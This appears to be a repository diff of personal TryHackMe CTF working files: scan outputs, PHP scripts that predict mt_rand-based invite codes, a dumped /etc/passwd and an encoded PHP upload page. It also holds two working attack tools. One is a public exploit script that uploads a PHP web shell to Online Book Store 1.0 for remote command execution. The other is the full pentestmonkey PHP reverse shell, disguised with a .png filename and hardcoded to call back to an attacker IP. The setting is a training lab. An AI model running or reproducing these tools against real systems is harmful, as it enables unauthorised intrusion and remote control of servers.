<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Dashboard</title>
<link href="/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<header class="bg-primary text-white text-center py-3">
<h1>Dashboard</h1>
</header>
<main class="container my-5">
<h2>Welcome, hello@fake.thm! - Flag: THM{CryptographyPwn007}</h2>
<a href="?action=logout" class="btn btn-danger">Logout</a>
<table class="table mt-4">
<thead>
<tr>
<th>Username</th>
<th>Role</th>
</tr>
</thead>
<tbody>
<tr>
<td>hello@fake.thm</td>
<td>user</td>
</tr>
<tr>
<td>admin@fake.thm</td>
<td>admin</td>
</tr>
</tbody>
</table>
</main>
<footer class="bg-light text-center py-3">
<p>&copy; <strong>2025
</strong> Decryptify</p>
<form method="get">
<input type="hidden" name="date" value="+KLFnGqUbCmwFdWQnLAIzk9GCqfIegXfKnhRWNiXPE4=">
</form>
</footer>
</body>
</html>

24
CTF/Decryptify1.2/gobuster_1.output Normal file
View File

@@ -0,0 +1,24 @@
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://decryptify.thm:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 320] [--> http://decryptify.thm:1337/js/]
/css (Status: 301) [Size: 321] [--> http://decryptify.thm:1337/css/]
/logs (Status: 301) [Size: 322] [--> http://decryptify.thm:1337/logs/]
/javascript (Status: 301) [Size: 328] [--> http://decryptify.thm:1337/javascript/]
/phpmyadmin (Status: 301) [Size: 328] [--> http://decryptify.thm:1337/phpmyadmin/]

BIN
CTF/Decryptify1.2/images/dashboard.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 56 KiB

BIN
CTF/Decryptify1.2/images/dashboard_date.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 71 KiB

BIN
CTF/Decryptify1.2/images/dashboard_source.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 128 KiB

20
CTF/Decryptify1.2/invite.js Normal file
View File

@@ -0,0 +1,20 @@
This function generates a invite_code against a user email.
// Token generation example
function calculate_seed_value($email, $constant_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$seed_value = hexdec($email_length + $constant_value + $email_hex);
return $seed_value;
}
$seed_value = calculate_seed_value($email, $constant_value);
mt_srand($seed_value);
$random = mt_rand();
$invite_code = base64_encode($random);

31
CTF/Decryptify1.2/nmap.output Normal file
View File

@@ -0,0 +1,31 @@
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 17:56 CEST
Nmap scan report for decryptify.thm (10.10.177.70)
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6a:76:21:04:a5:3d:3e:08:90:28:15:5c:66:50:6b:de (RSA)
| 256 3e:ab:19:7c:94:a2:33:f4:9c:ce:b2:8c:9c:fc:a9:e8 (ECDSA)
|_ 256 6a:16:f3:e0:74:5d:ca:83:16:15:91:a2:42:a7:74:60 (ED25519)
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login - Decryptify
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 43.52 ms 10.14.0.1
2 44.69 ms decryptify.thm (10.10.177.70)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.73 seconds

32
CTF/Decryptify1.2/php/invite_code.php Normal file
View File

@@ -0,0 +1,32 @@
<?php
function calculate_constant_value($email, $seed_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$constant_value = dechex($seed_value) - ($email_length + $email_hex);
return $constant_value;
}
function calculate_seed_value($email, $constant_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$seed_value = hexdec($email_length + $constant_value + $email_hex);
return $seed_value;
}
$email1 = "alpha@fake.thm";
$email2 = "hello@fake.thm";
$seed_array = [1324931, 428529271, 719176282, 933931643, 1493184672, 1723879575, 2232092689];
foreach($seed_array as $seed) {
$constant_value = calculate_constant_value($email1, $seed);
$seed_value = calculate_seed_value($email2, $constant_value);
mt_srand($seed_value);
$random = mt_rand();
$invite_code = base64_encode($random);
echo "The invite code for " . $constant_value . " is: " . $invite_code . "\n";
}
?>

32
CTF/Decryptify1.2/php/invite_code1.php Normal file
View File

@@ -0,0 +1,32 @@
<?php
function calculate_constant_value($email, $seed_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$constant_value = dechex($seed_value) - ($email_length + $email_hex);
return $constant_value;
}
function calculate_seed_value($email, $constant_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$seed_value = hexdec($email_length + $constant_value + $email_hex);
return $seed_value;
}
$email1 = "alpha@fake.thm";
$email2 = "admin@fake.thm";
$seed_array = [1324931, 428529271, 719176282, 933931643, 1493184672, 1723879575, 2232092689];
foreach($seed_array as $seed) {
$constant_value = calculate_constant_value($email1, $seed);
$seed_value = calculate_seed_value($email2, $constant_value);
mt_srand($seed_value);
$random = mt_rand();
$invite_code = base64_encode($random);
echo "The invite code for " . $constant_value . " is: " . $invite_code . "\n";
}
?>

11
CTF/Decryptify1.2/php/test1.php Normal file
View File

@@ -0,0 +1,11 @@
<?php
$email = "alpha@fake.thm";
$seed_value = 1324931;
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$sum_value = dechex($seed_value);
$constant_value = $sum_value - ($email_length + $email_hex);
echo "The constant value is: " . $constant_value;
?>

18
CTF/Decryptify1.2/php/test2.php Normal file
View File

@@ -0,0 +1,18 @@
<?php
function calculate_seed_value($email, $constant_value) {
$email_length = strlen($email);
$email_hex = hexdec(substr($email, 0, 8));
$seed_value = hexdec($email_length + $constant_value + $email_hex);
return $seed_value;
}
$email = "hello@fake.thm";
$constant_value = 99999;
$seed_value = calculate_seed_value($email, $constant_value);
mt_srand($seed_value);
$random = mt_rand();
$invite_code = base64_encode($random);
echo "The invite code for " . $email . " is: " . $invite_code;
?>

1
CTF/Decryptify1.2/php_mt_seed Submodule

Submodule CTF/Decryptify1.2/php_mt_seed added at 2d6a7afb80

47
CTF/ExploitingAVulnerabilityV2/exploit.py Executable file
View File

@@ -0,0 +1,47 @@
# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-01-07
# Exploit Author: Tib3rius
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Ubuntu 16.04
# CVE: N/A
import argparse
import random
import requests
import string
import sys
parser = argparse.ArgumentParser()
parser.add_argument('url', action='store', help='The URL of the target.')
args = parser.parse_args()
url = args.url.rstrip('/')
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
file = {'image': (random_file + '.php', payload, 'text/php')}
print('> Attempting to upload PHP web shell...')
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
print('> Verifying shell upload...')
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
if random_file in r.text:
print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
if launch_shell.lower() == 'y':
while True:
cmd = str(input('RCE $ '))
if cmd == 'exit':
sys.exit(0)
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
print(r.text)
else:
if r.status_code == 200:
print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
else:
print('> Web shell failed to upload! The web server may not have write permissions.')

1
CTF/Expose/emails.txt Normal file
View File

@@ -0,0 +1 @@
hacker@root.thm

22
CTF/Expose/gobuster.output Normal file
View File

@@ -0,0 +1,22 @@
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://expose.thm:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 315] [--> http://expose.thm:1337/admin/]
/phpmyadmin (Status: 301) [Size: 320] [--> http://expose.thm:1337/phpmyadmin/]
/%CE%9C%CE%B7%CF%87%CE%B1%CE%BD%CE%B9%CF%83%CE%BC%CF%8C%CF%82_%CF%84%CF%89%CE%BD_%CE%91%CE%BD%CF%84%CE%B9%CE%BA%CF%85%CE%B8%CE%AE%CF%81%CF%89%CE%BD (Status: 414) [Size: 356]
/press-release-the-spanish-government-the-regional-government-of-madrid-and-the-town-hall-of-madrid-sign-a-cooperation-agreement-with-the-international-summit-on-democracy-terrorism-and-security (Status: 414) [Size: 356]

23
CTF/Expose/gobuster_1.output Normal file
View File

@@ -0,0 +1,23 @@
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://expose.thm:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 315] [--> http://expose.thm:1337/admin/]
/javascript (Status: 301) [Size: 320] [--> http://expose.thm:1337/javascript/]
/phpmyadmin (Status: 301) [Size: 320] [--> http://expose.thm:1337/phpmyadmin/]
/server-status (Status: 403) [Size: 277]

74
CTF/Expose/nmap.output Normal file
View File

@@ -0,0 +1,74 @@
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-19 12:07 CEST
Nmap scan report for expose.thm (10.10.216.49)
Host is up (0.043s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.99.89
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a3:04:20:56:9f:32:73:ff:50:0d:80:6d:2d:c0:d1:04 (RSA)
| 256 1e:0a:55:db:71:19:ab:1d:43:53:05:8c:d9:b6:42:18 (ECDSA)
|_ 256 af:30:61:89:75:74:0e:ae:9f:a2:90:e3:ea:b2:68:5e (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: EXPOSED
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/load/sockets/5min: 0.20
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/heap/maximum: 49688
| $SYS/broker/load/bytes/received/1min: 16.45
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/messages/sent: 1
| $SYS/broker/uptime: 110 seconds
| $SYS/broker/store/messages/bytes: 178
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/messages/received: 1
| $SYS/broker/load/sockets/1min: 0.91
| $SYS/broker/load/sockets/15min: 0.07
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/load/bytes/sent/5min: 0.79
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/bytes/received: 18
| $SYS/broker/load/bytes/received/15min: 1.19
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/messages/received/15min: 0.07
|_ $SYS/broker/load/connections/5min: 0.20
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 40.69 ms 10.14.0.1
2 41.53 ms expose.thm (10.10.216.49)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.97 seconds

1
CTF/Expose/passwd.txt Normal file
View File

@@ -0,0 +1 @@
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false zeamkish:x:1001:1001:Zeam Kish,1,1,:/home/zeamkish:/bin/bash ftp:x:114:121:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin bind:x:115:122::/var/cache/bind:/usr/sbin/nologin Debian-snmp:x:116:123::/var/lib/snmp:/bin/false redis:x:117:124::/var/lib/redis:/usr/sbin/nologin mosquitto:x:118:125::/var/lib/mosquitto:/usr/sbin/nologin fwupd-refresh:x:119:126:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin

191
CTF/Expose/php-reverse-shell.php.png Normal file
View File

@@ -0,0 +1,191 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.14.99.89'; // CHANGE THIS
$port = 9000; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

1
CTF/Expose/php_encode.txt Normal file
View File

@@ -0,0 +1 @@
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCiRiYXNlUGF0aCA9ICIvIjsNCj8+DQoNCg0KDQoNCjwhRE9DVFlQRSBodG1sPg0KPGh0bWwgbGFuZz0iZW4iPg0KDQo8P3BocA0KJGJhc2VQYXRoID0gIiI7DQppbmNsdWRlICdoZWFkZXIucGhwJzsNCj8+DQoNCg0KPCFET0NUWVBFIGh0bWw+DQoNCg0KDQoNCg0KICA8IS0tIE1haW4gQ29udGVudCAtLT4NCjxtYWluIGNsYXNzPSIgbXgtYXV0byBweS04ICBtaW4taC1bODB2aF0gZmxleCBpdGVtcy1jZW50ZXIganVzdGlmeS1jZW50ZXIgZ2FwLTEwIGZsZXgtY29sIHhsOmZsZXgtcm93Ij4NCiA8P3BocA0KIC8vcHJpbnRfcigkX0ZJTEVTKTsNCiAgICAkcGFzc3dvcmQgPSAkX1BPU1RbJ3Bhc3N3b3JkJ10gPz8gJyc7DQogICAgJGVycm9yX21lc3NhZ2UgPSBmYWxzZTsNCgkgaWYgKCRwYXNzd29yZCA9PT0gJ3plYW1raXNoJyBBTkQgIWlzc2V0KCRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddKSl7DQoJCSRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddID0gdHJ1ZTsNCg0KDQogICAgfQ0KCQ0KCWlmKGlzc2V0KCRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddKSl7DQoJDQoJCWlmICghaXNzZXQoJF9GSUxFU1snZmlsZSddKSl7DQoJCWVjaG8gIjxwPiI7DQoJCWVjaG8gJzxoMT5GaWxlIFVwbG9hZDwvaDE+DQoJCQk8Zm9ybSBtZXRob2Q9IlBPU1QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG9uc3VibWl0PSJyZXR1cm4gdmFsaWRhdGUoKTsiIGlkPSJ2YWxpZGZvcm0iPg0KCQkJPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIGlkPSJmaWxlIiBhY2NlcHQ9Ii5wbmciIHJlcXVpcmVkPg0KCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9hZCI+DQoJCQk8L2Zvcm0+JzsNCgkJDQoJCWVjaG8gIjwvcD4iOw0KCX0NCgllbHNlew0KCQkNCgkJCQkkdGFyZ2V0RGlyID0gInVwbG9hZF90aG1fMTAwMS8iOyAvLyBEaXJlY3Rvcnkgd2hlcmUgdXBsb2FkZWQgZmlsZXMgd2lsbCBiZSBzdG9yZWQNCgkJCQkkdGFyZ2V0RmlsZSA9ICR0YXJnZXREaXIgLiBiYXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7IC8vIFBhdGggb2YgdGhlIHVwbG9hZGVkIGZpbGUNCg0KCQkJCQkvLyBDaGVjayBpZiBmaWxlIGlzIGEgdmFsaWQgdXBsb2FkDQoJCQkJaWYgKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRGaWxlKSkgew0KCQkJCWVjaG8gJzxoMT5GaWxlIHVwbG9hZGVkIHN1Y2Nlc3NmdWxseSEgTWF5YmUgbG9vayBpbiBzb3VyY2UgY29kZSB0byBzZWUgdGhlIHBhdGg8c3BhbiBzdHlsZT0iIGRpc3BsYXk6IG5vbmU7Ij5pbiAvdXBsb2FkX3RobV8xMDAxIGZvbGRlcjwvc3Bhbj4gPGgxPic7DQoJCQkJfSBlbHNlIHsNCgkJCQllY2hvICJFcnJvciB1cGxvYWRpbmcgZmlsZS4iOw0KCQkJCX0NCg0KCSAgZXhpdDsNCgl9DQoJfQ0KCWVsc2V7DQoJCQ0KCQ0KCSAgaWYgKCRwYXNzd29yZCA9PT0gJ3plYW1raXNoJyBBTkQgIWlzc2V0KCRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddKSl7DQoJCSRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddID0gdHJ1ZTsNCg0KDQogICAgfSBlbHNlIHsNCiAgICAgIGVjaG8gJzxkaXYgY2xhc3M9ImZpeGVkIGluc2V0LTAgIGZsZXggaXRlbXMtY2VudGVyIGp1c3RpZnktY2VudGVyIGJnLWdyYXktOTAwIGJnLW9wYWNpdHktNTAiPic7DQogICAgICBlY2hvICc8ZGl2IGNsYXNzPSJiZy13aGl0ZSByb3VuZGVkIHAtOCBtYXgtdy1zbSBteC1hdXRvIj4nOw0KICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIiA+JzsNCiAgICAgIGVjaG8gJzxsYWJlbCBjbGFzcz0iYmxvY2sgbWItNCI+UGxlYXNlIGVudGVyIHRoZSBwYXNzd29yZDogDQoJICA8YnI+SGludDogSXQgaXMgdGhlIG5hbWUgb2YgbWFjaGluZSB1c2VyIHN0YXJ0aW5nIHdpdGggbGV0dGVyICJ6IjwvbGFiZWw+JzsNCiAgICAgIGVjaG8gJzxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIGNsYXNzPSJ3LWZ1bGwgcC0yIGJvcmRlciByb3VuZGVkIj4nOw0KICAgICAgZWNobyAnPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIGNsYXNzPSJiZy1ncmF5LTkwMCB0ZXh0LXdoaXRlIHB4LTQgcHktMiBtdC00IHJvdW5kZWQgaG92ZXI6YmctZ3JheS03MDAiPlN1Ym1pdDwvYnV0dG9uPic7DQogICAgICBlY2hvICc8L2Zvcm0+JzsNCiAgICAgIGVjaG8gJzwvZGl2Pic7DQogICAgICBlY2hvICc8L2Rpdj4nOw0KICAgICAgICAkZXJyb3JfbWVzc2FnZSA9IHRydWU7DQoNCiAgICB9DQoJDQoJDQoJfQ0KCQ0KCQ0KCQ0KCQ0KICANCiAgICA/Pg0KIA0KPC9tYWluPg0KPD9waHANCmluY2x1ZGUgJ2Zvb3Rlci5waHAnOw0KPz4NCjwvYm9keT4NCg0KPHNjcmlwdD4NCg0KDQpmdW5jdGlvbiB2YWxpZGF0ZSgpew0KDQogdmFyIGZpbGVJbnB1dCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdmaWxlJyk7DQogIHZhciBmaWxlID0gZmlsZUlucHV0LmZpbGVzWzBdOw0KICANCiAgaWYgKGZpbGUpIHsNCiAgICB2YXIgZmlsZU5hbWUgPSBmaWxlLm5hbWU7DQogICAgdmFyIGZpbGVFeHRlbnNpb24gPSBmaWxlTmFtZS5zcGxpdCgnLicpLnBvcCgpLnRvTG93ZXJDYXNlKCk7DQogICAgDQogICAgaWYgKGZpbGVFeHRlbnNpb24gPT09ICdqcGcnIHx8IGZpbGVFeHRlbnNpb24gPT09ICdwbmcnKSB7DQogICAgICAvLyBWYWxpZCBmaWxlIGV4dGVuc2lvbiwgcHJvY2VlZCB3aXRoIGZpbGUgdXBsb2FkDQogICAgICAvLyBZb3UgY2FuIHN1Ym1pdCB0aGUgZm9ybSBvciBwZXJmb3JtIGZ1cnRoZXIgcHJvY2Vzc2luZyBoZXJlDQogICAgICBjb25zb2xlLmxvZygnRmlsZSB1cGxvYWRlZCBzdWNjZXNzZnVsbHknKTsNCgkgIHJldHVybiB0cnVlOw0KICAgIH0gZWxzZSB7DQogICAgICAvLyBJbnZhbGlkIGZpbGUgZXh0ZW5zaW9uLCBkaXNwbGF5IGFuIGVycm9yIG1lc3NhZ2Ugb3IgdGFrZSBhcHByb3ByaWF0ZSBhY3Rpb24NCiAgICAgIGNvbnNvbGUubG9nKCdPbmx5IEpQRyBhbmQgUE5HIGZpbGVzIGFyZSBhbGxvd2VkJyk7DQoJICByZXR1cm4gZmFsc2U7DQogICAgfQ0KICB9DQp9DQoNCjwvc2NyaXB0Pg0KPC9odG1sPg0KDQo=

1
CTF/Hammer/188ade1.key Normal file
View File

@@ -0,0 +1 @@
56058354efb3daa97ebab00fabd7a7d7

1000
CTF/Hammer/cut_ip_list.txt Normal file
View File

File diff suppressed because it is too large Load Diff

9
CTF/Hammer/error.logs Normal file
View File

@@ -0,0 +1,9 @@
[Mon Aug 19 12:00:01.123456 2024] [core:error] [pid 12345:tid 139999999999999] [client 192.168.1.10:56832] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
